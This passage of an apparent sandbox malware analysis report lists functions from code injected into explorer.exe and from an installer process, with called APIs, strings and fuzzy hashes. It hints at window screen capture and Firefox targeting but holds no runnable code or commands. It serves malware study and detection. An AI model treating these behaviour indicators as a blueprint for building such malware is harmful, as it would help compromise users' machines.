Instruction Fuzzy Hash: 1D016232601B41C1EB54DB36E84436D3361FBC8FA4F488135CA5A07758DF38D986C740

Function 0F3D8C3C Relevance: 6.0, APIs: 4, Instructions: 34windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 0F3D8C4F

Part of subcall function 0F3D99D0: GetWindowRect.USER32 ref: 0F3D99F8
Part of subcall function 0F3D99D0: CreateCompatibleDC.GDI32 ref: 0F3D9A01
Part of subcall function 0F3D99D0: CreateCompatibleBitmap.GDI32 ref: 0F3D9A1F
Part of subcall function 0F3D99D0: SelectObject.GDI32 ref: 0F3D9A2E
Part of subcall function 0F3D99D0: PrintWindow.USER32 ref: 0F3D9A3D
Part of subcall function 0F3D99D0: DeleteObject.GDI32 ref: 0F3D9A89
Part of subcall function 0F3D99D0: DeleteDC.GDI32 ref: 0F3D9A92

GetWindowLongA.USER32 ref: 0F3D8C70
SetWindowLongA.USER32 ref: 0F3D8C85
GetVersionExA.KERNEL32 ref: 0F3D8C98

Part of subcall function 0F3D8CD0: GetTopWindow.USER32 ref: 0F3D8CE5
Part of subcall function 0F3D8CD0: GetWindow.USER32 ref: 0F3D8D0E

Memory Dump Source

Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd

Yara matches

Similarity

API ID: Window$CompatibleCreateDeleteLongObject$BitmapPrintRectSelectVersionVisible
String ID:
API String ID: 567582119-0
Opcode ID: c09e8f431026a883c3de20a9801f16b9959e239982204442eb7aeaec3bdd243d
Instruction ID: 71815ce8fc6086062e71bce29ae99bd884597f74d6ea605443f5769af8790974
Opcode Fuzzy Hash: c09e8f431026a883c3de20a9801f16b9959e239982204442eb7aeaec3bdd243d
Instruction Fuzzy Hash: 7E018162701A42C2EB309B66F84476AB321F789BE4F484135EE5A47BA5CF3CD698C700

Function 0F3DAC88 Relevance: 6.0, APIs: 4, Instructions: 34stringthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc_dbg.MSVCRT ref: 0F3DACA1
lstrcpy.KERNEL32 ref: 0F3DACB9
CreateThread.KERNEL32 ref: 0F3DACDE
??3@YAXPEAX@Z.MSVCRT ref: 0F3DACEE

Memory Dump Source

Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd

Yara matches

Similarity

API ID: ??3@CreateThread_malloc_dbglstrcpy
String ID:
API String ID: 3519057016-0
Opcode ID: 0ff5c5edc898e7c854b521c10a36106da95f7f5a2f03b0f825eb23a3efea4888
Instruction ID: 4dfce8fe2d2934c16d6facb6ff1c493987ed384abb8dd152d49cb9367fdfec13
Opcode Fuzzy Hash: 0ff5c5edc898e7c854b521c10a36106da95f7f5a2f03b0f825eb23a3efea4888
Instruction Fuzzy Hash: 06F0A432A05B8183EB258B11F60437AA261F748BF4F488535EE4947B69DF3CC6858704

Function 0F3D864C Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0F3D8660
??3@YAXPEAX@Z.MSVCRT ref: 0F3D8697
??3@YAXPEAX@Z.MSVCRT ref: 0F3D86A2
memset.MSVCRT ref: 0F3D86B2

Memory Dump Source

Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd

Yara matches

Similarity

API ID: ??3@$CriticalEnterSectionmemset
String ID:
API String ID: 4090242730-0
Opcode ID: 82edf1b70ad49228e8aa7cfc154c632a148f26fb05a25e9d52645217873000f6
Instruction ID: b0b0f1fcf2f1fe9256e7344be7a144f6e87a916543806a1873c375a667632d1f
Opcode Fuzzy Hash: 82edf1b70ad49228e8aa7cfc154c632a148f26fb05a25e9d52645217873000f6
Instruction Fuzzy Hash: C7016272610A46D2EB259F25E8843B93371F788FA4F854432CA0A47934DF38C5D9D340

Function 0C36B130 Relevance: 6.0, APIs: 4, Instructions: 30COMMONLIBRARYCODE

Download Yara Rule

APIs

abort.LIBCMT ref: 0C36B167
_NMSG_WRITE.LIBCMT ref: 0C36B18D
_set_abort_behavior.LIBCMT ref: 0C36B199
abort.LIBCMT ref: 0C36B19E

Memory Dump Source

Source File: 00000002.00000002.3176672303.000000000C350000.00000020.00000001.00020000.00000000.sdmp, Offset: 0C350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_c350000_explorer.jbxd

Yara matches

Similarity

API ID: abort$_set_abort_behavior
String ID:
API String ID: 2064194629-0
Opcode ID: dc58f8c0e7bbf0cce20ba8cb0b632d3b999d5a2622377be11c7867a0c8efaa55
Instruction ID: e4adabd40004eb619cda2cb5882d85fc8dd4d1ff526ba0b51272b28d98fda638
Opcode Fuzzy Hash: dc58f8c0e7bbf0cce20ba8cb0b632d3b999d5a2622377be11c7867a0c8efaa55
Instruction Fuzzy Hash: D2F08278332B0986FE1867A0EC547582360FB44704F54CE15850D47B28FE3CD15D9F42

Function 0C36E54C Relevance: 6.0, APIs: 4, Instructions: 17COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_error_mode.LIBCMT ref: 0C36E555
_set_error_mode.LIBCMT ref: 0C36E564
_NMSG_WRITE.LIBCMT ref: 0C36E57B
_NMSG_WRITE.LIBCMT ref: 0C36E585

Memory Dump Source

Source File: 00000002.00000002.3176672303.000000000C350000.00000020.00000001.00020000.00000000.sdmp, Offset: 0C350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_c350000_explorer.jbxd

Yara matches

Similarity

API ID: _set_error_mode
String ID:
API String ID: 1949149715-0
Opcode ID: a728608133e97f596589ad2e2f9e93d8d2c46a6cb7fed67bee0efa2cd8959fd4
Instruction ID: eefc8ccb6bc257b8476701a71180607d1ac2e057017446010962351f05878c9a
Opcode Fuzzy Hash: a728608133e97f596589ad2e2f9e93d8d2c46a6cb7fed67bee0efa2cd8959fd4
Instruction Fuzzy Hash: A4D05E68F3121682FA3D3391457037A1105EB52304F448A3DC30549AC5F949C99D0E13

Function 0C36EF7C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 144COMMON

Download Yara Rule

APIs

_IsNonwritableInCurrentImage.LIBCMT ref: 0C36F037

Strings

, xrefs: 0C36F0C6
csm, xrefs: 0C36F01D

Memory Dump Source

Source File: 00000002.00000002.3176672303.000000000C350000.00000020.00000001.00020000.00000000.sdmp, Offset: 0C350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_c350000_explorer.jbxd

Yara matches

Similarity

API ID: CurrentImageNonwritable
String ID: $csm
API String ID: 3104724169-717980254
Opcode ID: 3f094d6fcd6df7c79df031b4f2a61ff3beef2fca3ab7281f970d40d8a3288114
Instruction ID: a65dd5a564cc0d8feb26512051f0eb8eebdeb5b819cbc9a600a6cf74a353bd79
Opcode Fuzzy Hash: 3f094d6fcd6df7c79df031b4f2a61ff3beef2fca3ab7281f970d40d8a3288114
Instruction Fuzzy Hash: D3518A363226408BCB14DF69F444BA877A6F348BD8F64C621DE8647B08EB75D886CB50

Function 0C36E2C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

__crtCapturePreviousContext.LIBCMT ref: 0C375491
__raise_securityfailure.LIBCMT ref: 0C375533

Strings

Complete Object Locator', xrefs: 0C37552C

Memory Dump Source

Source File: 00000002.00000002.3176672303.000000000C350000.00000020.00000001.00020000.00000000.sdmp, Offset: 0C350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_c350000_explorer.jbxd

Yara matches

Similarity

API ID: CaptureContextPrevious__crt__raise_securityfailure
String ID: Complete Object Locator'
API String ID: 37250909-3230220348
Opcode ID: 90da94f41b87728ce8c421d02ed5f259416c229b2a16919387991320736c17e0
Instruction ID: 75a551c9f2eff656afd1d94bb5c3a172da0d477c85dd5e06017a130b787c499e
Opcode Fuzzy Hash: 90da94f41b87728ce8c421d02ed5f259416c229b2a16919387991320736c17e0
Instruction Fuzzy Hash: AC214675226B00C1FF909B19F85275977B4F384344F909326EA8D827A4EFBCC619CB00

Function 0C36AE00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMON

Download Yara Rule

APIs

std::locale::_Locimp::_Locimp_dtor.LIBCPMT ref: 0C36AE19

Part of subcall function 0C36AF34: std::_Lockit::_Lockit.LIBCPMT ref: 0C36AF52
Part of subcall function 0C36AF34: free.LIBCMT ref: 0C36AF90

free.LIBCMT ref: 0C36AE27

Part of subcall function 0C36C2E4: _errno.LIBCMT ref: 0C36C304

Strings

ror(error_complexity): The complexity of an attempted match against a regular expression exceeded a pre-set level., xrefs: 0C36AE31

Memory Dump Source

Source File: 00000002.00000002.3176672303.000000000C350000.00000020.00000001.00020000.00000000.sdmp, Offset: 0C350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_c350000_explorer.jbxd

Yara matches

Similarity

API ID: free$Locimp::_Locimp_dtorLockitLockit::__errnostd::_std::locale::_
String ID: ror(error_complexity): The complexity of an attempted match against a regular expression exceeded a pre-set level.
API String ID: 257637515-3799310485
Opcode ID: 85757340480da28e00f2fde29b916a2feecb1c12a4bdf59558abf013eebd9474
Instruction ID: 933ba61f63ca402df51d213cd32f09af7ac06268cf6ea42c3ae632491ffa6262
Opcode Fuzzy Hash: 85757340480da28e00f2fde29b916a2feecb1c12a4bdf59558abf013eebd9474
Instruction Fuzzy Hash: B2F03932722B0081EF15DFA6F4907A963A4EB8CB94FA991219A4C47B18DF38C498CB51

Function 0F3D86D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

Part of subcall function 0F3C6FEC: ??3@YAXPEAX@Z.MSVCRT ref: 0F3C7040
Part of subcall function 0F3C6FEC: ??3@YAXPEAX@Z.MSVCRT ref: 0F3C7049

Part of subcall function 0F3C7444: lstrlenA.KERNEL32 ref: 0F3C7478
Part of subcall function 0F3C7444: lstrlenA.KERNEL32 ref: 0F3C7485
Part of subcall function 0F3C7444: lstrlenA.KERNEL32 ref: 0F3C7490
Part of subcall function 0F3C7444: lstrlenA.KERNEL32 ref: 0F3C749B
Part of subcall function 0F3C7444: _malloc_dbg.MSVCRT ref: 0F3C74A9
Part of subcall function 0F3C7444: wsprintfA.USER32 ref: 0F3C74CB
Part of subcall function 0F3C7444: lstrcatA.KERNEL32 ref: 0F3C74D7

??3@YAXPEAX@Z.MSVCRT ref: 0F3D8708
??3@YAXPEAX@Z.MSVCRT ref: 0F3D8715

Strings

Firefox, xrefs: 0F3D86F3

Memory Dump Source

Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd

Yara matches

Similarity

API ID: ??3@lstrlen$_malloc_dbglstrcatwsprintf
String ID: Firefox
API String ID: 1282472873-3930541253
Opcode ID: 443c36165f1c6097550f90311bf0591eeeb820b6f4a49580b6ad4cc65bdd2471
Instruction ID: a0d56b9372cd502c64effcfc0ee0cbdeabbec8821e1136260afa395648cfd85e
Opcode Fuzzy Hash: 443c36165f1c6097550f90311bf0591eeeb820b6f4a49580b6ad4cc65bdd2471
Instruction Fuzzy Hash: 9CE0ED61620A8782EA609B12F8547763325F798B95F052035DD1E0BB26DF3CC558D740

Function 0C36A6E8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 0C36A704

Part of subcall function 0C36C678: std::exception::_Copy_str.LIBCMT ref: 0C36C697

_CxxThrowException.LIBCMT ref: 0C36A725

Strings

sAlloc, xrefs: 0C36A710

Memory Dump Source

Source File: 00000002.00000002.3176672303.000000000C350000.00000020.00000001.00020000.00000000.sdmp, Offset: 0C350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_c350000_explorer.jbxd

Yara matches

Similarity

API ID: Copy_strExceptionThrowstd::exception::_std::exception::exception
String ID: sAlloc
API String ID: 1924332735-1594135104
Opcode ID: 9217aa22bd1210272f5a7a857eccb05bef9aadce28c2d3acd366c1dc70812c7e
Instruction ID: 4649494e5803c8aa5cf85bc7aea4a3e6eacef4f2d6fbd0012728732936885d9c
Opcode Fuzzy Hash: 9217aa22bd1210272f5a7a857eccb05bef9aadce28c2d3acd366c1dc70812c7e
Instruction Fuzzy Hash: 42E04F71624B8992DA20DB50F484789A764F398348F409615E2CD43B28EF7CC20DCF01

Function 0C36A678 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMONLIBRARYCODE

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 0C36A68B

Part of subcall function 0C36C678: std::exception::_Copy_str.LIBCMT ref: 0C36C697

_CxxThrowException.LIBCMT ref: 0C36A6A8

Strings

ceCounter, xrefs: 0C36A697

Memory Dump Source

Source File: 00000002.00000002.3176672303.000000000C350000.00000020.00000001.00020000.00000000.sdmp, Offset: 0C350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_c350000_explorer.jbxd

Yara matches

Similarity

API ID: Copy_strExceptionThrowstd::exception::_std::exception::exception
String ID: ceCounter
API String ID: 1924332735-2283763082
Opcode ID: d800f3934b662547b3ff2380a2fe71f645d64b3e9fe41d4f478a3787e21480e6
Instruction ID: 312fd98f3ae046a782072ea2932cce05e7d082040f6d82b416a932119a7e3946
Opcode Fuzzy Hash: d800f3934b662547b3ff2380a2fe71f645d64b3e9fe41d4f478a3787e21480e6
Instruction Fuzzy Hash: 25D01221114B8A92DE24DB40F444389B364F795308F809612E2CC07E28EF7CC30DCF41

Analysis Process: 3CBD.tmp.Installer.exePID: 6828, Parent PID: 2580COMMON

Executed Functions

Function 00007FFD9B5F0D35 Relevance: 2.0, Strings: 1, Instructions: 719COMMON

Download Yara Rule

Strings

H, xrefs: 00007FFD9B5F0F53

Memory Dump Source

Source File: 00000005.00000002.2198760779.00007FFD9B5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9b5f0000_3CBD.jbxd

Similarity

API ID:
String ID: H
API String ID: 0-2852464175
Opcode ID: e9b9a482757eb873b7e2abbbfa05a66966b53d5778c129066dc84376f67d2b24
Instruction ID: 41c686ac609b29295cd334577fbae154b3fd2035510cc07bd843acc8e233c4b7
Opcode Fuzzy Hash: e9b9a482757eb873b7e2abbbfa05a66966b53d5778c129066dc84376f67d2b24
Instruction Fuzzy Hash: E142C320F1994E4FE799FF788875BA9BBA1EF54340F4841BAD00DC76D7CD2869858740

Function 00007FFD9B5F3131 Relevance: 1.2, Instructions: 1245COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2198760779.00007FFD9B5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9b5f0000_3CBD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9856fea844e050be664ff73b5637103dfb5bade535bdc26919a8719c57ffe19
Instruction ID: 3acbd4d2d903fc7cd5f8390d4d87910205a0e75c7983de4e43fb866c97440b2b
Opcode Fuzzy Hash: e9856fea844e050be664ff73b5637103dfb5bade535bdc26919a8719c57ffe19
Instruction Fuzzy Hash: 57B26870E1991D8FDBA9EF58C8A9BA8B7B1FB58301F5041EAD00DE3651CA755E81CF00

Function 00007FFD9B5F1B51 Relevance: 1.5, Strings: 1, Instructions: 224COMMON

Download Yara Rule

Strings

H, xrefs: 00007FFD9B5F1B69

Memory Dump Source

Source File: 00000005.00000002.2198760779.00007FFD9B5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9b5f0000_3CBD.jbxd

Similarity

API ID:
String ID: H
API String ID: 0-2852464175
Opcode ID: 1ea18ba34b18fd78d95eb5fca8ef9b7922e4ea3ed67d3c0f154b082fa27e5b39
Instruction ID: 80a79cba8036f2d43bc87506990ab9a77c41ea6ceea941274527c043dbb7ed21
Opcode Fuzzy Hash: 1ea18ba34b18fd78d95eb5fca8ef9b7922e4ea3ed67d3c0f154b082fa27e5b39
Instruction Fuzzy Hash: 9C618021B1980A4FE7D5FBA888697BDB7D2EF88344F450179D01EC32EBDE286D418741

Function 00007FFD9B5F2CA5 Relevance: 1.4, Strings: 1, Instructions: 191COMMON

Download Yara Rule

Strings

s<L_^, xrefs: 00007FFD9B5F2E37

Memory Dump Source

Source File: 00000005.00000002.2198760779.00007FFD9B5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9b5f0000_3CBD.jbxd

Similarity

API ID:
String ID: s<L_^
API String ID: 0-2202289036
Opcode ID: 826c73337c17ffaae72b6f9ea154d961e2a74136a192ff16c9d1acc07c34a33b
Instruction ID: 29784dbe71de4c8d2627f9d200e6d7f1cdeecf978be33e5b22f117ad86e51210
Opcode Fuzzy Hash: 826c73337c17ffaae72b6f9ea154d961e2a74136a192ff16c9d1acc07c34a33b
Instruction Fuzzy Hash: 7D61FA93B0FAC90FF7A786F44875364AF50AF51304B4D00FBE498878E7C51AA949C352

Function 00007FFD9B5F1A65 Relevance: 1.4, Strings: 1, Instructions: 140COMMON

Download Yara Rule

Strings

3, xrefs: 00007FFD9B5F1B16

Memory Dump Source

Source File: 00000005.00000002.2198760779.00007FFD9B5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9b5f0000_3CBD.jbxd

Similarity

API ID:
String ID: 3
API String ID: 0-1842515611
Opcode ID: 222232ba867945242741fdeffc8fbba523943975522d7bdaa07a7ba4d00a7103
Instruction ID: f19e6ede28d5508ebe6757b47fbf34f33f8d855116aef3b44be754aa4e353953
Opcode Fuzzy Hash: 222232ba867945242741fdeffc8fbba523943975522d7bdaa07a7ba4d00a7103
Instruction Fuzzy Hash: B2419B71F0DE4D4FEB69EB1898626E9BBE1EF85350F14016ED09DC3197DD24A8028781

Function 00007FFD9B5F2D20 Relevance: 1.4, Strings: 1, Instructions: 130COMMON

Download Yara Rule

Strings

s<L_^, xrefs: 00007FFD9B5F2E37

Memory Dump Source

Source File: 00000005.00000002.2198760779.00007FFD9B5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9b5f0000_3CBD.jbxd

Similarity

API ID:
String ID: s<L_^
API String ID: 0-2202289036
Opcode ID: c8d5effe2d01dbc4e1b752b3f9cc439faa47758b50660ef64c9ddfd8b2258d7d
Instruction ID: 868d9295a15ed640adf2c51870888c521eff1e0da6c6ebeef55d6b4e5f06214e
Opcode Fuzzy Hash: c8d5effe2d01dbc4e1b752b3f9cc439faa47758b50660ef64c9ddfd8b2258d7d
Instruction Fuzzy Hash: AE410A93B0FAC90FF7A78AF44864365AF51AF45304B4D00BFF088869E7C61AAA49C351

Function 00007FFD9B5F1A2F Relevance: 1.3, Strings: 1, Instructions: 98COMMON

Download Yara Rule

Strings

3, xrefs: 00007FFD9B5F1B16

Memory Dump Source

Source File: 00000005.00000002.2198760779.00007FFD9B5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9b5f0000_3CBD.jbxd

Similarity

API ID:
String ID: 3
API String ID: 0-1842515611
Opcode ID: cfc514397a5bbb07146abf7e1e349849811836b5a5f8b6a099bf008936498fa8
Instruction ID: 44493d6551c067f8914293edf7f2efb2b30b96044294ef1ccdc221573b66f9ca
Opcode Fuzzy Hash: cfc514397a5bbb07146abf7e1e349849811836b5a5f8b6a099bf008936498fa8
Instruction Fuzzy Hash: 4A315B71F1DD4D4BEB75EB1C54612ADBBE2EF99390F19026ED049C319BCD24A8028781

Function 00007FFD9B5F4A69 Relevance: .5, Instructions: 486COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2198760779.00007FFD9B5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9b5f0000_3CBD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d4224da803e58799b7a7ee6bb433a03a155b71efd66f005b6bb075356b775b0
Instruction ID: e0f65e7da0a0d39cb75f588d72a540e811872a56ccccfab6de4d702a08c68ed7
Opcode Fuzzy Hash: 6d4224da803e58799b7a7ee6bb433a03a155b71efd66f005b6bb075356b775b0
Instruction Fuzzy Hash: F6E19E20B28A090BE795FB7D8869BBAB7D2FF88604F450579D54EC32E7DD2CAD418341

Function 00007FFD9B5F523B Relevance: .3, Instructions: 301COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2198760779.00007FFD9B5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9b5f0000_3CBD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3afd6842ae15a9f60f52fd8906fffbd85c008d25b3226cd95ef23684c29d0aa8
Instruction ID: 9ee3b15760e6fa1c5de3c01d4788de17f823bb72d2efe554ac0a9b716e57d0c2
Opcode Fuzzy Hash: 3afd6842ae15a9f60f52fd8906fffbd85c008d25b3226cd95ef23684c29d0aa8
Instruction Fuzzy Hash: A5914461B0EA8E0FE796BBA898757A9BBD1EF89350F0501BBE04DC71D3CD1C69468341

Function 00007FFD9B5F17AD Relevance: .3, Instructions: 293COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2198760779.00007FFD9B5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9b5f0000_3CBD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3ee8140fef875cacac12fca6999cd11a44607f1c3f3d2d1101f5fe77f503659
Instruction ID: 8b1dfb43941dc6027f25fe0e84edc5410b8e0c9a8a3fd5ab91b1619a02b5c55a
Opcode Fuzzy Hash: c3ee8140fef875cacac12fca6999cd11a44607f1c3f3d2d1101f5fe77f503659
Instruction Fuzzy Hash: 66815B21B1EE8E0BE79AA76888757B97FD1EF94300F6540BED05DC75DBDD28A8028341

Function 00007FFD9B5F55F7 Relevance: .3, Instructions: 258COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2198760779.00007FFD9B5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9b5f0000_3CBD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 480a56d93dd18ccb6e76b02e77d0d63f17aab2b99e973cf9bf6c04aa3178e8ef
Instruction ID: 22e0761d11be3aa8c478257abac121c4600bf5cd9b9d65f701457d570bfd02ad
Opcode Fuzzy Hash: 480a56d93dd18ccb6e76b02e77d0d63f17aab2b99e973cf9bf6c04aa3178e8ef
Instruction Fuzzy Hash: E9712561B1EA890FE79AABB858757A9BFD1EF89250F0500BBE04DC71D7CD1C6906C342

Function 00007FFD9B5F243D Relevance: .2, Instructions: 211COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2198760779.00007FFD9B5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9b5f0000_3CBD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6afd70a66d04f4e559ce914ae7587efe3d01cfeddd3d3c585058480ab5a8890
Instruction ID: b2f00e85b7f39e9609d588fd043cfc8fdcc6fa6792221ca3dc06b77c5f2dd119
Opcode Fuzzy Hash: a6afd70a66d04f4e559ce914ae7587efe3d01cfeddd3d3c585058480ab5a8890
Instruction Fuzzy Hash: 8151D431B0A90E4FE799BBB884796B87BD2EF88304F514179E00DC76D7CE29A942C741

Function 00007FFD9B5F246E Relevance: .2, Instructions: 191COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2198760779.00007FFD9B5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9b5f0000_3CBD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c0690205af4c8edc7d03d83a1d7f25b7c7820bdfc7fc27ad35ee85abb4626e9
Instruction ID: 515ea26ef0fb3cd4eefa39603237beba0280cd1fa3c6cf4652e00bb83cfc629d
Opcode Fuzzy Hash: 7c0690205af4c8edc7d03d83a1d7f25b7c7820bdfc7fc27ad35ee85abb4626e9
Instruction Fuzzy Hash: 6951E620B0AA4A4FE79AA7B884797B87BD2EF85314B5541B9E00DC76D7CD29AC02C741

Function 00007FFD9B5F2E5D Relevance: .2, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2198760779.00007FFD9B5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9b5f0000_3CBD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e03d816a60b465d8c8058d93377328e55e575262971d0c842d48bfa2d857b52c
Instruction ID: b3b9a3144804156fdb935d5a2c2e5c1a7a50919ca026a92033286abe3cc878c4
Opcode Fuzzy Hash: e03d816a60b465d8c8058d93377328e55e575262971d0c842d48bfa2d857b52c
Instruction Fuzzy Hash: 2041A621B1890D4FEB94BBBC48297BDB6D2FF98350F5501B6E41DC32D7DD28A9028742

Function 00007FFD9B5F2E70 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2198760779.00007FFD9B5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9b5f0000_3CBD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea8d879fdb1f67fb12017e1d730311127f1c55d3baf2a97548c71a2beaf2e444
Instruction ID: 50b3fc43d7b207423a913c5173157af2f8feff2e513e4dbfa8c9f74786a374d7
Opcode Fuzzy Hash: ea8d879fdb1f67fb12017e1d730311127f1c55d3baf2a97548c71a2beaf2e444
Instruction Fuzzy Hash: BB419721B1890D4BEB94BBBC48297BDB6D2EF98750F55017AE41DC32D7DD2CA9028781

Function 00007FFD9B5F22AB Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2198760779.00007FFD9B5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9b5f0000_3CBD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9703d1a6c48e856eaef1bc98d431c9f7732aea049d9471176fa970d0cb9f9f6e
Instruction ID: 4fcc8f6f6da50f547dec650b3ad77e02109c16d56415c278e6d179cc5871e12a
Opcode Fuzzy Hash: 9703d1a6c48e856eaef1bc98d431c9f7732aea049d9471176fa970d0cb9f9f6e
Instruction Fuzzy Hash: 3541B820B28D0A4BE789FBAC8869BF9B6D1FF58344F544576E00EC32D7DE2C69458741

Function 00007FFD9B5F0951 Relevance: .1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2198760779.00007FFD9B5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9b5f0000_3CBD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1246902be733a21bf06a7a146c552d2f742ba2d4815b1693a341a224874a50c
Instruction ID: c55e50bd0eabdbe327e03395a40e0f778b69b7dba0ff78332c90a5a332a8bd40
Opcode Fuzzy Hash: d1246902be733a21bf06a7a146c552d2f742ba2d4815b1693a341a224874a50c
Instruction Fuzzy Hash: 66417C30E1494D8FEB95EFA8C8A5AFDBBB1FF58700F554139E009D32A6CE246941CB40

Function 00007FFD9B5F2A30 Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2198760779.00007FFD9B5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9b5f0000_3CBD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24e193c79c5ff129ea5f40f53fb1305c11be82c5afff719d59d81796fb011af9
Instruction ID: 99219672564f927b82141bb840997662b5c11cefeed260b5ae250c0e361affea
